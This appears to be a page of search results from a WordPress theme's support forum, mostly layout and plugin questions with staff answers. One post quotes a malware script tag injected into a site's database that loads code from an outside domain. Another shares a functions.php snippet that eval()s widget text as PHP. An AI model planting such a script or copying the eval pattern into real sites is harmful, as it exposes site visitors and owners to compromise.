Search Results for 'amp'

Results from the Forum
cleverliving
Participant
#0

so i am trying to replicate this theme with woocommerce (https://demo.tagdiv.com/newspaper_tech/shop/#).

this is my website (http://dancegifted.com)

i have not been able to produce the block header you see in the example website that says “feature products”. further more i have not been able to produce any block headers using my visual composer.

can you please help me.

eddycom
tagDiv Member

I SOLVE, for me the conflict is “AMP for WP” plugin. I already report this issue to author plugin. I disabled it and VC work. (Thanks Alin).

The problem now is Tag Div Composer. Doesen’t work (in my theme) also with all plugin disabled (eccept VC and Td composer)

pianoweb
Participant
#0

Hi, i had big problems with a malware injected in our database.
The team of securi said that the malware: <script type=”text/javascript” src=”//ylx-4.com/pun.php?section=General&pt=6&pub=986496&ga=g”></script>
was injected by an hole on your theme.
I want only to suggest to you to make a check.

swolly
Participant
#0

Hi,
in our homepage we use Biggrid3 with several categories (example: category 1 2 3)

After that we use several block4, one of each category (so the first only category 1, the second only category 2 and the third only category 3).

The problem is that if i write one new post of category 1 it appears both on biggrid and block4.

If i use offset, example offset1, but i write 4 articles of category 2 in the first block4 i don’t see the first article of category1!

How can i avoid duplicate?

Regards
swolly

Bogdan B.
tagDiv Staff

In header style 1, you cannot increase the logo size because of the ad placement. There is an ad spot for a header ad next to the logo that will not allow the logo to increase any further. Here is an example of the containers for header style 1: https://www.screencast.com/t/BdqiuefdvPPk
The logo has no place to increase further in size.

Thanks.

hpy2bsal
tagDiv Member

I shouldn’t have mentioned those two images because I was referring more to the fact that your Big Full Grid 2 and Big Full Grid 3 are not showing full width the way they are displayed on your demo modules. Here are the two Big Full Grid images as they appear on my homepage and when checking on other computer screens. https://cultivatingthegardener.com/wp-content/uploads/2017/11/Example-1-not-full-width.jpg and https://cultivatingthegardener.com/wp-content/uploads/2017/11/Example-2-not-full-width.jpg

Not only that, but all other modules that I want set as full width are not changing. There continues to be left and right margins on the entire page, other than where I changed it on the header, menu, and footer in the theme panel. Because of that, I feel that there is something going wrong with my site because I cannot force anything else to go full width, even after deleting all plugins, etc.

I appreciate your help.

fawel
Participant
#0

What if i use my purchase code in localhost and live server?
Can i do this?

kesp
tagDiv Member

Hi Catalin,

I’d like to do it Newspaper theme too. I couldn’t see how so brought Newsmag.

So basically you’re saying there isn’t actually a template with that style and that if i want that style I’m actually going to have to go through every single post and manually set the text padding?

Also wondering:

How do you make the images within posts remain full width?
How do you make the sub title appear below the main image?

As in this example: https://demo.tagdiv.com/newsmag/power-is-only-for-real-mens-not-for-boys/

Thanks,

K

  • This reply was modified 8 years by kesp.
Francis
Participant
#0

Hi Team,

How can I set so that the featured image will show on pages (not posts). Now, I have to add the image in the content directly.

Please kindly advise.

Here is an example:

https://www.nicobros.com/bounce-rate-improvement-service/

Catalin
tagDiv Staff

Hello firdos,

The Facebook Classic only bring the information from Facebook and not send it to Facebook. For example, if your post is shared on Facebook, all the Likes will be displayed on your site for that post but the reverse is not true. I have inspected this feature and it seems to work as expected. Try to clear all the caches and check the results. -> https://www.screencast.com/t/o4WqhCcKoxv

I hope that you understand me!

Thanks for your understanding!

Francis
Participant
#0

Hi Team,

How could we change the page title font size for both desktop and mobile versions?

Below is an example page. We want to make the title bigger in font size:

https://www.nicobros.com/bounce-rate-improvement-service/

Thank you very much.

craftofcharisma
Participant
#0

How do I customize the categories listed to the right of the section block headers? For example, to the right of the “Don’t Miss” default section header, every category is listed in light gray. Then in every other section block, the same categories (all of them) are listed. I would like to customize which categories appear in each section block that I create using TD composer. How do I modify this?

You can see what I mean here.

10fttall
Participant
#0

Hi, I deleted all the posts that came with the theme and I would like to have them back as reference.
Any way of doing this?
Thanks

eklisiarh
tagDiv Member

In the custom HTML widget I use PHP to fill the info from the forms. Here is what I do:

I add following code to the functions.php:

add_filter('widget_text','execute_php',100);
function execute_php($html){
if(strpos($html,"<"."?php")!==false){
ob_start();
eval("?".">".$html);
$html=ob_get_contents();
ob_end_clean();
}
return $html;
}

Than I use Advanced Custom Fields plugin to gather data in forms and I add these to HTML widget with this code:

<?php global $wp_query;
if(is_object($wp_query->queried_object) &amp;&amp; $wp_query->queried_object->ID)
{
echo get_post_meta($wp_query->queried_object->ID, 'gtelefonnummer', true);
}
?>

My problem is: Since the last theme update I cannot save this code in HTML widget anymore because there are errors (which are not errors but PHP code).

So where I already saved this code everything works well but I cant save any new code because system doesn’t let me to do this. Here is screenshot:

Since widgets are theme related I presume you changed something so that I cant save this. Can this be disabled and how?

  • This reply was modified 8 years by eklisiarh.
  • This reply was modified 8 years by eklisiarh.
ipolak
tagDiv Member

hi,
we are very satisfied with your theme and don’t want to change it. at the begining there was no idea to use rss features, but now it’s very important for us to make iz work asap. so far we didn’t even know there is a problem with rss &amp; newspaper theme.

i hope some solution will apear soon.
best
i.

Bogdan B.
tagDiv Staff

Hello,
You can hide elements at any time using css. Tagdiv composer allows you to add an extra class to a block and then you can use that class with css to hide the block in mobile screens. Here is an example: https://www.screencast.com/t/PRC1i1uUv
Then you can use this code:
.customclass{
display:none!
}

Add it in the theme panel under custom code for mobile devices(advanced css tab).

Thank you!

Bogdan B.
tagDiv Staff

The post title hover color is grabbed on separate blocks from the block title background color if you have one set other than default Here is an example: https://www.screencast.com/t/WFF0XDqBRvZ

Thank you!

Catalin
tagDiv Staff

Hello opusuno,

Most likely, you have some additional customizations to your menus, use the Speed Booster plugin and that’s why you bring some stupid flipping. So, if you want to remove the top menu bar, for example, you can turn off it from Theme panel, from this -> https://www.screencast.com/t/1b6Cx9OtAc

Thanks for the message!

bemibel
tagDiv Member

I recorde 2 videos to show you the problems. When the videos were recorded, there was no custom css and all the caches were cleaned.

Viedo 1
https://www.youtube.com/watch?v=9YIkaJg132c&feature=youtu.be
All the content made with visual composer is loading boxed first, and then it turns to full width.

Video 2
https://www.youtube.com/watch?v=CStlOlzaVNw&feature=youtu.be
It always loads first the default theme font, and then it turns to the one I definded on the theme panel (the font is custom and I uploaded it trought the theme).

Then, if you go to my site on mobile, you will see the effect is the same in both cases, and moreover the menu is loading black first, and then it turns to white.

Everything is very strange… 🙁

Bogdan B.
tagDiv Staff

Hello,

The only tested and recommended plugins to use with our theme are these ones:

WP Super Cache- caching plugin

Contact form 7- used to make contact forms

bbPress- forum plugin

BuddyPress- social network plugin

Font Awesome 4 Menus- icon pack, supported in the theme menus

Jetpack- plugin with lots of features *it may slow down your site

WooCommerce- eCommerce solution

WordPress (Yoast) SEO- SEO plugin

Wp User Avatar- Change users avatars

WPML – multilingual plugin

Anything beyond this list is not tested and I cannot say for sure if it will work or not.
ActiveCampaign is not among the tested and recommended plugins so I cannot say for sure if it will work or not with our theme.

Thanks.

FreshySites
tagDiv Member

They say:

“Call API by city ID instead of city name, city coordinates or zip code. In this case you get precise respond exactly for your city.”

https://openweathermap.org/current

Additionally, I think it would be beneficial to allow us to add Lat and Long options instead of the exact city ID. For example, the API allows for:

api.openweathermap.org/data/2.5/weather?lat=35&amp;lon=139

Or even ZIP Code:
api.openweathermap.org/data/2.5/weather?zip={zip code},{country code}

It would be cool if there was a radio button option in the theme options for us to choose from:

  • City Name
  • City ID
  • Lat, Long
  • ZIP Code

Because right now, your use of City Name is too limiting.

tbrmedia
Participant
#0

Hi,

My team is also experiencing the problem.

http://tbrnewsmedia.com/swimming-success-port-jeffersons-kyra-sommerstad-repeats-suffolk-championships/

I tried the below recommended edit to the style sheet and it did not fix the issue. Do you have any other suggestions while we wait for the theme update?

Thanks so much! -Rob

>>>>>>>>>>>>>>>>>>>>>>>

Simion C. #202086
Nov 17, 2017 at 1:52 pm
Hi,

We are aware of the issue with the image captions, after the WordPress update. We will release a theme update that will fix the issue as soon as possible. Sorry for any inconvenience caused.
If you would like to try and resolve the issue, try editing the theme stylesheet here
https://www.screencast.com/t/l1hDDIy7
Remove the !important tag from the code
https://www.screencast.com/t/7LTyVdUR
Or wait for the theme update.

Thanks

SW1988
Participant
#0

Hi there,

I hired a company to help me with my SEO and get my page on the radar on google.
They said to me that they can’t get my page higher because of the layout code.

This is what they said :

” When I walk through it, I notice that there is a lot of “layout code” in this source code. Mind you: how you see the website, Google also reads it like that! And if Google first has to struggle through a lot of code before they reach the real content, that has a negative effect on your ranking.

https://prnt.sc/hcs72b

The above example, what you find around line 500 in your source code, is all pure layout and not interesting for Google. And the error in this is in your template.
The eventually relevant code of your website starts at line 1.020 …. For comparison: at (example website) that is line 143, at my site line 121, and that is how I can continue for a while.

Conclusion: with your current template you will never end up high on Google. “

They recommend me to change the theme if I want to benefit from their qualities.

Is this true? Can I do something to prevent me from changing the theme?

kesp
Participant
#0

Hi,

I brought Newsmag because i wanted to use the centered with side padding layouts in the ‘full layout vintage’ https://demo.tagdiv.com/newsmag/power-is-only-for-real-mens-not-for-boys/ and ‘full layout nutrition’ https://demo.tagdiv.com/newsmag/my-girlfriend-has-exhausted-our-strategic-supply-of-string-cheese/ post samples.

However I can’t find a default post template that matches these layouts even with sidebar turned off.

Which template should I be using please?

Thanks,

K

Bogdan B.
tagDiv Staff

Hello,

Our theme already has nested comments. Here is an example of the default comments functionality in our theme: https://www.screencast.com/t/6RD8UZPfP0k
I’m not sure why your comments are not nested. Please disable all plugins except the page builder, clear cache and reset cdn files if you use it. Please also check any custom code you might have added to the theme panel or the theme files. If you use a child theme, please switch to the main theme to make sure it does not affect the proper functionality of the theme.

Thank you!

Viewing 25 results - 26,926 through 26,950 (of 38,683 total)